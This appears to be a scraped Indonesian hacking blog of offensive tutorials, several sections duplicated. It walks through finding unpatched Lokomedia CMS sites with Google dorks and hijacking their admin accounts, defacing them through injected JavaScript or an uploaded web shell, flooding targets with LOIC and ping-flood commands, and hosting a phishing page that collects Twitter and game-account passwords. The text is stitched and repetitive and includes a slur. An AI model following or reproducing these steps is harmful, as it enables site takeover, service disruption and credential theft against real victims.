http://site/admin/foto_berita/nama_shell.php
kalau misalkan anda bukan di banner uploadnya
biasanya berada di http://site/files/nama_shell.php
Nah setelah itu Oprek deh Websitenya
Mungkin hanya itu tutorial saya, kalo ada salah maaf ya Cool
Thanks buat : BagsFreak untuk script JS-Overlay nya Big Grin
Sekian dan terima kasih...
SUMBER : Newbie Security
Langsung aja ke tutorial
Dork yang sering saya pakai buat Cari Lokomedia
inurl:/media.php?module=berita
inurl:/admin/foto_berita
inurl:/admin/content.php?module=user
inurl:/adminweb/
1.Search Google Pakai Dork Diatas
2. Kalo ketemu langsung aja ke exploit
http://site/admin/content.php?module=user
3. Kalo Muncul Kaya begini
berarti belum di patch tuh ama adminnya Sleepy saatnya kesempatan kita
4. Langsung aja Klik Pilihan Edit
nanti akan jadi kayak gini
Edit Sesuka hati anda, lalu klik save, Nanti akan otomatis disuruh login lalu login pakai ID & Pass yang sudah diganti tadi..
5. Kalo udah muncul kayak gini, terus di gmana'in ?
Tinggal di Deface, Caranya? bisa pakai cara JS Overlay atau Tanem Shell
Berikut Tutorialnya
JS Overlay
Buat dulu file JS atau apa pada website anda, bisa pakai site gratisan atau site yang sudah anda tanem shell
terus buat file misalkan devilscream.js
lalu isikan Script berikut
http://newbie-security.or.id/code/js-overlay.txt
Nah, biar Web Lokomedianya ke deface gmana?
Pada CMS Lokomedia masuk ke Menu Berita.
Kalo gak ada pilihan menu berita langsung ke URL
http://site/admin/media.php?module=berita
Kalo kagak bisa yah kagak bisa Dodgy
Lalu klik Add New Berita
Pada Bagian judul masukan Script berikut :
Code:
http://situs-anda-menyimpan-file-js-overlay/devilscream.js
Isi atau lainnya gak usah di isi gak apa-apa
Setelah itu save, percuma kalo gak di save Dodgy
Tanem Shell
Masuk ke Bagian menu Banner kalo gak ada juga pake URL http://site/admin/media.php?module=banner
kalo gak bisa juga yah emang nasib Dodgy
Atau gak cari Menu yang bisa upload file
Setelah itu Klik AddNews
Pada Bagian Browse File Pilih Shell Kalian, yang lainnya gak usah diisi..
Setelah di Upload masukin URL kaya gini
http://site/admin/foto_berita/nama_shell.php
kalau misalkan anda bukan di banner uploadnya
biasanya berada di http://site/files/nama_shell.php
Nah setelah itu Oprek deh Websitenya
Mungkin hanya itu tutorial saya, kalo ada salah maaf ya Cool
Thanks buat : BagsFreak untuk script JS-Overlay nya Big Grin
Sekian dan terima kasih...
SUMBER : Newbie Security
pngertian DDOS
oke kali ini saya akan membahas tentang pengertian ddos dan cara
penggunaan'a =)) karna barusan ada yg menanyakan apa itu ddos =))
langsung to the point aja
apa sih DDOS itu?
Serangan DDOS ( Denial Distribute of services ) Attack, mungkin adalah serangan yang paling simple di lakukan namun efeknya sangat berbahaya.
Situs-situs besar seperti yahoo.com , ebay.com , hotmail.com, e-gold.com , 2checkout.com dan lain-lain pernah mengalami serangan yang mengakibatkan situs nya tidak bisa di akses selama beberapa jam.
Yang terbaru adalah situs e-gold.com pada tahun 2005 kemarin, situs nya di serang dengan memakai metode DDOS ( Denial Distribute of services ).
Bagaimana cara kerja DDOS ?
Jika Anda memakai program windows , coba lakukan ini di komputer Anda.
1. Start , Programs , Accessories , Command Prompt
2. Kemudian di Command prompt ketikan , Ping -t http://www.situsyangdituju.com
atau bisa juga Start, Run , Ping -t http://www.situsyangdituju.com
Kemudian komputer Anda akan mengirimkan paket informasi ke situs yang di tuju tadi, pada dasarnya dengan perintah tersebut komputer Anda mengirimkan ucapan "Halo , apa ada orang di situ ? " , ke situs yang di tuju tadi. kemudian server situs yang di tuju tadi mengirimkan jawaban balik dengan mengatakan : "ya, di sini ada orang"
Sekarang bayangkan, jika ada ribuan komputer, dalam waktu bersamaan melakukan perintah tersebut di situs yang di tuju. 1 komputer mengirimkan data sebesar 32 bytes / detik ke situs yang di tuju. Jika ada 10.000 komputer yang melakukan perintah tersebut secara bersamaan, itu artinya ada kiriman data sebesar 312 Mega Bytes/ detik yang di terima oleh situs yang di tuju tadi.
Dan server dari situs yang di tuju tadi pun harus merespon kiriman yang di kirim dari 10.000 komputer secara bersamaan. Jika 312 MB/ detik data yang harus di proses oleh server, dalam 1 menit saja, server harus memproses kiriman data sebesar 312 MB x 60 detik = 18720 MB. Bisa di tebak, situs yang di serang dengan metode ini akan mengalami Over Load / kelebihan data, dan tidak sanggup memproses kiriman data yang datang.
Pertanyaan nya , bagaimana 10.000 komputer tersebut bisa ikut melakukan serangan?
Komputer-komputer lain yang ikut melakukan serangan tersebut di sebut komputer zombie, dimana sudah terinfeksi semacam adware. jadi si Penyerang hanya memerintahkan komputer utamanya untuk mengirimkan perintah ke komputer zombie yang sudah terinfeksi agar melakukan Ping ke situs yang di tuju. Oleh karena itu pentingnya ada firewall di komputer anda, untuk memonitor paket yang keluar maupun yang masuk dari komputer anda.
Jika anda belum memiliki firewall bisa coba zone alarm, silahkan download KLIK DI SINI
Adware biasanya di dapat dari program-program gratisan yang anda download, untuk itu juga harus berhati-hati mendownload program gratisan.
Bagaimana jika ada situs yang mengklaim situsnya sedang di serang , bagaimana kita tahu itu benar atau bohong ?
Bisa kita lakukan analisa untuk mendeteksi benar atau tidaknya serangan tersebut terjadi, atau hanya mengaku-ngaku saja.
Jika anda berkecimpung di dunia Investment semacam HYIP, autosurf , atau pun situs investasi lainnya.
biasanya sering anda jumpai ada situs yang adminnya bilang situsnya sedang di serang pakai metode DDOS, dan terpaksa harus menutup situs nya, ujung-ujungnya yah admin tersebut melakukan SCAM, atau tidak membayar membernya.
Berikut tahap-tahap melakukan analisa benar atau tidaknya situs tsb di serang.
1. Beri Nilai kemampuan finansial dari situs investasi tersebut.
- Sekarang ini sudah banyak jasa penyedia ANTI DDOS , biaya nya pun cukup mahal yakni berkisar $600 / bulan sampai dengan $1000 / bulan.
sekarang anda nilai situs tersebut, apakah mampu membayar jasa tersebut atau tidak. Jika bisnis nya bernilai ratusan ribu dollar , masak sih tidak mau ngeluarin uang $600 / bulan untuk mengamankan situs nya ? Sering anda lihat kan , ada situs investasi yang menulis :
Total investasi : sekian ratus ribu dollar
Total Withdrawal : sekian ratus ribu dollar
Jika benar uangnya sebanyak itu, tentu tidak ragu untuk membayar services ANTI DDOS sebesar $600 / bulan.
2. Periksa kebenaran.
Jika situs tersebut mengklaim mereka memiliki dan menyewa services ANTI DDOS, tanyakan di mana mereka menyewanya . biasanya di situs penyedia layanan ANTI DDOS di tulis nama-nama client yang menggunakan atau memakai services mereka.
3. Periksa hostingnya, apakah menggunakan satu private IP address, atau shared IP address.
Private IP address artinya = 1 nomor IP untuk 1 domain
Shared IP address artinya = 1 nomor IP untuk BANYAK DOMAIN.
sebagai contoh :
situs semuabisnis.com menggunakan shared IP address. IP untuk domain semuabisnis.com adalah http://75.126.30.10/ dan ada sekitar 14 domain / situs yang menggunakan IP ini , salah satunya adalah ambri-servers.com
Jadi jika situs semuabisnis.com di serang, maka efeknya akan terasa juga di ambri-servers.com maupun di situs-situs lainnya yang memiliki IP yang sama dengan semuabisnis.com
Jika semuabisnis.com mengaku di serang, namun anda masih bisa mengakses ambri-servers.com ataupun masih bisa mengakses situs lainnya yang memiliki IP yang sama dengan semuabisnis.com , maka itu tidak benar paling cuma buat gaya-gayaan.. hehehe.
Begitu juga dengan situs investasi yang mengaku situs nya di serang, coba periksa ip addressnya. menggunakan private IP atau shared IP. jika shared IP, coba periksa situs lainnya yang memiliki IP
yang sama dengan situs investasi tersebut. apakah situs lainnya masih bisa di akses atau tidak.
Jika seseorang melakukan serangan ke semuabisnis.com , maka yang tidak bisa di akses bukan hanya situs semuabisnis.com melainkan situs-situs lainnya yang memiliki IP address yang sama akan mengalami overload juga.
Untuk mengecek dia menggunakan Shared hosting atau tidak, lakukan ini.
PING -t situsyangdituju.com
kemudian catat no ip.yg muncul di command prompt.
Setelah itu periksa ip tersebut di http://whois.webhosting.info/no IP jika hanya muncul satu domain, maka IP tersebut khusus untuk 1 domain ( private IP )
Jika banyak nama-nama situs yang muncul, maka IP tersebut adalah 1 IP untuk banyak domain ( shared IP )
Cara Melakukan DDoS Attack
serangan ini tidka dapat dicegah karena memang keroyokan alias ya berdo’a saja supaya situs kita tidak down akibat kena serangan DDoS Attack. ada pun cara untuk melakukan DDoS Attack sangat-sangat mudah, bahkan anak SMP pun bisa melakukanya. untuk mereka yang menggunakan OS Windows dapat menggunakan dua cara. cara pertama adalah dengan menggunakan software bernama Low Orbit Ion Cannon.(308 kb)program ini tidak perlu diinstall cukup jalankan seperti program portable lainya.
1. Jalankan program
2. Setelah muncul Jendela di bagian URL masukan situs yang ingin diserang misalkan http://www.coba.com, lalu klik lock on
3. setelah itu klik tombol IMMA CHARGIN MAH LAZER
4. silakan lihat hasilnya dibawah, disana terdapat keterangan berapa jumlah packet yang connecting, requesting, downloading, downloaded, requested dan failed.
5. jika berhasil berarti berarti pada bagian yang failed seharusnya banyak , yang menandakan bahwa server telah down.
cara kedua adalah dengan membanjiri Ping melalui command promt alias CMD. buka start->run dan ketikan cmd, atau tekan kombinasi tombol Windows + R dan ketik cmd, kemudian enter. setelah jendela Command Prompt muncul ketikan
#ping target.com
setelah itu akan muncul nomor ip dari situs tersebut, anggaplah nomor ip adalah 192.168.1.1, kemudian saatnya melakukan serangan ke sistem server hosting target.com.
#ping 192.168.1.1 -l 39999 -n 10000000 -w 0.00001
yang berarti :
n = besarnya Ping , nilai “10000000″ silakan diubah sesuai dengan yang diinginkan .
192.168.1.1= ganti alamat ip dari situs target.com
-W 0,00001 = Ini adalah periode waktu tunggu antar satu ping.
dua cara tadi jika anda di windows, bagaimana jika di linux, hal ini jauh lebih mudah untuk dilakukan tapi hal pertama yang harus dimiliki adalah hak sebagai root. silakan ketika command ini di terminal linux.
#sudo ping -f 192.168.1.1
system akan melakukan ping sebanyak yang bisa dibuat, biasanya 10.000/menit, jika respondnya adalah Host Unreachable dll, berarti system telah down. untuk alamat 192.168.1.1 silakan ganti dengan alamat ip situs target.com.
Selamat mencoba dan Try With Yout Own Risk.
apa sih DDOS itu?
Serangan DDOS ( Denial Distribute of services ) Attack, mungkin adalah serangan yang paling simple di lakukan namun efeknya sangat berbahaya.
Situs-situs besar seperti yahoo.com , ebay.com , hotmail.com, e-gold.com , 2checkout.com dan lain-lain pernah mengalami serangan yang mengakibatkan situs nya tidak bisa di akses selama beberapa jam.
Yang terbaru adalah situs e-gold.com pada tahun 2005 kemarin, situs nya di serang dengan memakai metode DDOS ( Denial Distribute of services ).
Bagaimana cara kerja DDOS ?
Jika Anda memakai program windows , coba lakukan ini di komputer Anda.
1. Start , Programs , Accessories , Command Prompt
2. Kemudian di Command prompt ketikan , Ping -t http://www.situsyangdituju.com
atau bisa juga Start, Run , Ping -t http://www.situsyangdituju.com
Kemudian komputer Anda akan mengirimkan paket informasi ke situs yang di tuju tadi, pada dasarnya dengan perintah tersebut komputer Anda mengirimkan ucapan "Halo , apa ada orang di situ ? " , ke situs yang di tuju tadi. kemudian server situs yang di tuju tadi mengirimkan jawaban balik dengan mengatakan : "ya, di sini ada orang"
Sekarang bayangkan, jika ada ribuan komputer, dalam waktu bersamaan melakukan perintah tersebut di situs yang di tuju. 1 komputer mengirimkan data sebesar 32 bytes / detik ke situs yang di tuju. Jika ada 10.000 komputer yang melakukan perintah tersebut secara bersamaan, itu artinya ada kiriman data sebesar 312 Mega Bytes/ detik yang di terima oleh situs yang di tuju tadi.
Dan server dari situs yang di tuju tadi pun harus merespon kiriman yang di kirim dari 10.000 komputer secara bersamaan. Jika 312 MB/ detik data yang harus di proses oleh server, dalam 1 menit saja, server harus memproses kiriman data sebesar 312 MB x 60 detik = 18720 MB. Bisa di tebak, situs yang di serang dengan metode ini akan mengalami Over Load / kelebihan data, dan tidak sanggup memproses kiriman data yang datang.
Pertanyaan nya , bagaimana 10.000 komputer tersebut bisa ikut melakukan serangan?
Komputer-komputer lain yang ikut melakukan serangan tersebut di sebut komputer zombie, dimana sudah terinfeksi semacam adware. jadi si Penyerang hanya memerintahkan komputer utamanya untuk mengirimkan perintah ke komputer zombie yang sudah terinfeksi agar melakukan Ping ke situs yang di tuju. Oleh karena itu pentingnya ada firewall di komputer anda, untuk memonitor paket yang keluar maupun yang masuk dari komputer anda.
Jika anda belum memiliki firewall bisa coba zone alarm, silahkan download KLIK DI SINI
Adware biasanya di dapat dari program-program gratisan yang anda download, untuk itu juga harus berhati-hati mendownload program gratisan.
Bagaimana jika ada situs yang mengklaim situsnya sedang di serang , bagaimana kita tahu itu benar atau bohong ?
Bisa kita lakukan analisa untuk mendeteksi benar atau tidaknya serangan tersebut terjadi, atau hanya mengaku-ngaku saja.
Jika anda berkecimpung di dunia Investment semacam HYIP, autosurf , atau pun situs investasi lainnya.
biasanya sering anda jumpai ada situs yang adminnya bilang situsnya sedang di serang pakai metode DDOS, dan terpaksa harus menutup situs nya, ujung-ujungnya yah admin tersebut melakukan SCAM, atau tidak membayar membernya.
Berikut tahap-tahap melakukan analisa benar atau tidaknya situs tsb di serang.
1. Beri Nilai kemampuan finansial dari situs investasi tersebut.
- Sekarang ini sudah banyak jasa penyedia ANTI DDOS , biaya nya pun cukup mahal yakni berkisar $600 / bulan sampai dengan $1000 / bulan.
sekarang anda nilai situs tersebut, apakah mampu membayar jasa tersebut atau tidak. Jika bisnis nya bernilai ratusan ribu dollar , masak sih tidak mau ngeluarin uang $600 / bulan untuk mengamankan situs nya ? Sering anda lihat kan , ada situs investasi yang menulis :
Total investasi : sekian ratus ribu dollar
Total Withdrawal : sekian ratus ribu dollar
Jika benar uangnya sebanyak itu, tentu tidak ragu untuk membayar services ANTI DDOS sebesar $600 / bulan.
2. Periksa kebenaran.
Jika situs tersebut mengklaim mereka memiliki dan menyewa services ANTI DDOS, tanyakan di mana mereka menyewanya . biasanya di situs penyedia layanan ANTI DDOS di tulis nama-nama client yang menggunakan atau memakai services mereka.
3. Periksa hostingnya, apakah menggunakan satu private IP address, atau shared IP address.
Private IP address artinya = 1 nomor IP untuk 1 domain
Shared IP address artinya = 1 nomor IP untuk BANYAK DOMAIN.
sebagai contoh :
situs semuabisnis.com menggunakan shared IP address. IP untuk domain semuabisnis.com adalah http://75.126.30.10/ dan ada sekitar 14 domain / situs yang menggunakan IP ini , salah satunya adalah ambri-servers.com
Jadi jika situs semuabisnis.com di serang, maka efeknya akan terasa juga di ambri-servers.com maupun di situs-situs lainnya yang memiliki IP yang sama dengan semuabisnis.com
Jika semuabisnis.com mengaku di serang, namun anda masih bisa mengakses ambri-servers.com ataupun masih bisa mengakses situs lainnya yang memiliki IP yang sama dengan semuabisnis.com , maka itu tidak benar paling cuma buat gaya-gayaan.. hehehe.
Begitu juga dengan situs investasi yang mengaku situs nya di serang, coba periksa ip addressnya. menggunakan private IP atau shared IP. jika shared IP, coba periksa situs lainnya yang memiliki IP
yang sama dengan situs investasi tersebut. apakah situs lainnya masih bisa di akses atau tidak.
Jika seseorang melakukan serangan ke semuabisnis.com , maka yang tidak bisa di akses bukan hanya situs semuabisnis.com melainkan situs-situs lainnya yang memiliki IP address yang sama akan mengalami overload juga.
Untuk mengecek dia menggunakan Shared hosting atau tidak, lakukan ini.
PING -t situsyangdituju.com
kemudian catat no ip.yg muncul di command prompt.
Setelah itu periksa ip tersebut di http://whois.webhosting.info/no IP jika hanya muncul satu domain, maka IP tersebut khusus untuk 1 domain ( private IP )
Jika banyak nama-nama situs yang muncul, maka IP tersebut adalah 1 IP untuk banyak domain ( shared IP )
Cara Melakukan DDoS Attack
serangan ini tidka dapat dicegah karena memang keroyokan alias ya berdo’a saja supaya situs kita tidak down akibat kena serangan DDoS Attack. ada pun cara untuk melakukan DDoS Attack sangat-sangat mudah, bahkan anak SMP pun bisa melakukanya. untuk mereka yang menggunakan OS Windows dapat menggunakan dua cara. cara pertama adalah dengan menggunakan software bernama Low Orbit Ion Cannon.(308 kb)program ini tidak perlu diinstall cukup jalankan seperti program portable lainya.
1. Jalankan program
2. Setelah muncul Jendela di bagian URL masukan situs yang ingin diserang misalkan http://www.coba.com, lalu klik lock on
3. setelah itu klik tombol IMMA CHARGIN MAH LAZER
4. silakan lihat hasilnya dibawah, disana terdapat keterangan berapa jumlah packet yang connecting, requesting, downloading, downloaded, requested dan failed.
5. jika berhasil berarti berarti pada bagian yang failed seharusnya banyak , yang menandakan bahwa server telah down.
cara kedua adalah dengan membanjiri Ping melalui command promt alias CMD. buka start->run dan ketikan cmd, atau tekan kombinasi tombol Windows + R dan ketik cmd, kemudian enter. setelah jendela Command Prompt muncul ketikan
#ping target.com
setelah itu akan muncul nomor ip dari situs tersebut, anggaplah nomor ip adalah 192.168.1.1, kemudian saatnya melakukan serangan ke sistem server hosting target.com.
#ping 192.168.1.1 -l 39999 -n 10000000 -w 0.00001
yang berarti :
n = besarnya Ping , nilai “10000000″ silakan diubah sesuai dengan yang diinginkan .
192.168.1.1= ganti alamat ip dari situs target.com
-W 0,00001 = Ini adalah periode waktu tunggu antar satu ping.
dua cara tadi jika anda di windows, bagaimana jika di linux, hal ini jauh lebih mudah untuk dilakukan tapi hal pertama yang harus dimiliki adalah hak sebagai root. silakan ketika command ini di terminal linux.
#sudo ping -f 192.168.1.1
system akan melakukan ping sebanyak yang bisa dibuat, biasanya 10.000/menit, jika respondnya adalah Host Unreachable dll, berarti system telah down. untuk alamat 192.168.1.1 silakan ganti dengan alamat ip situs target.com.
Selamat mencoba dan Try With Yout Own Risk.
you know me ? i'am newbie =))
jadi newbie itu gampang , tapi susah dijalanin =))
Membuat Web Phising
Baca Sampe Selesai gan !!
-First Buat akun Idhostinger dloo
-Kalo udah,langsung ke tab domain,trus buat akun baru
-udah ? beneran ? trus pilih kelola
<< Download Here >>
download dulu
kalo lu udh bikin Cari Tulisan Kelola Trus Klik tuh ..
cari tulisan File Manager 3
cari tulisan Upload,upload tuh file yang tadi lu download.
dan saatnya mencari trget,bilang aja kalo itu autolike lah ato apalah,auto follow lah (twitter)
untuk lihat Hasilnya, Para Gay cukup melihatnya dengan menambahkan Password.txt setelah link sobat! Contoh: http://sitesobat/password.txt
nb : bisa buat twitter,gemscool,dll
-First Buat akun Idhostinger dloo
-Kalo udah,langsung ke tab domain,trus buat akun baru
-udah ? beneran ? trus pilih kelola
<< Download Here >>
download dulu
kalo lu udh bikin Cari Tulisan Kelola Trus Klik tuh ..
cari tulisan File Manager 3
cari tulisan Upload,upload tuh file yang tadi lu download.
dan saatnya mencari trget,bilang aja kalo itu autolike lah ato apalah,auto follow lah (twitter)
untuk lihat Hasilnya, Para Gay cukup melihatnya dengan menambahkan Password.txt setelah link sobat! Contoh: http://sitesobat/password.txt
nb : bisa buat twitter,gemscool,dll
Subscribe to:
Posts (Atom)